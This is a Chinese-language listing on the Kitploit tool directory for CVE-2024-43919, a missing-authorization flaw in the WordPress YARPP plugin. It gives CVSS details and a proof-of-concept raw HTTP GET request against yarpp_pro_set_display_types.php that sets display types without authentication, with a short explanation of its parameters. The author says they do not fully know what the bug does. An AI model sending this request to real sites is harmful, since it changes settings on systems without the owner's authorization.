Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-43919 — YARPP <= 5.30.10 - 缺少授权 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-43919
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试错误配置
GitHubrandomrobbiebf/cve-2024-43919

CVE-2024-43919

YARPP <= 5.30.10 - 缺少授权

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-43919

YARPP <= 5.30.10 - 缺少授权

描述

WordPress 的 YARPP – Yet Another Related Posts Plugin 插件由于在 ~/includes/yarpp_pro_set_display_types.php 文件中缺少权限检查,导致存在未授权访问漏洞,影响版本包括 5.30.10 及之前的所有版本。这使得未经身份验证的攻击者能够设置显示类型。

root@kitploit:~
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin

信息

完全不知道这个漏洞具体做什么。

POC

以下是一个利用 YARPP 插件漏洞的原始 HTTP 请求示例:

root@kitploit:~
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com

在此请求中:

  • ypsdt 参数设置为 false 以绕过代码中的初始检查。
  • types[] 参数用于指定要设置的显示类型。在此示例中,传递了 post 和 page 作为类型。
  • Host 头部指定了托管易受攻击的 YARPP 插件的目标 WordPress 站点。

当此请求发送到安装有易受攻击版本的 YARPP 插件的 WordPress 站点时,它将无需任何身份验证或授权即可设置显示类型。

下载工具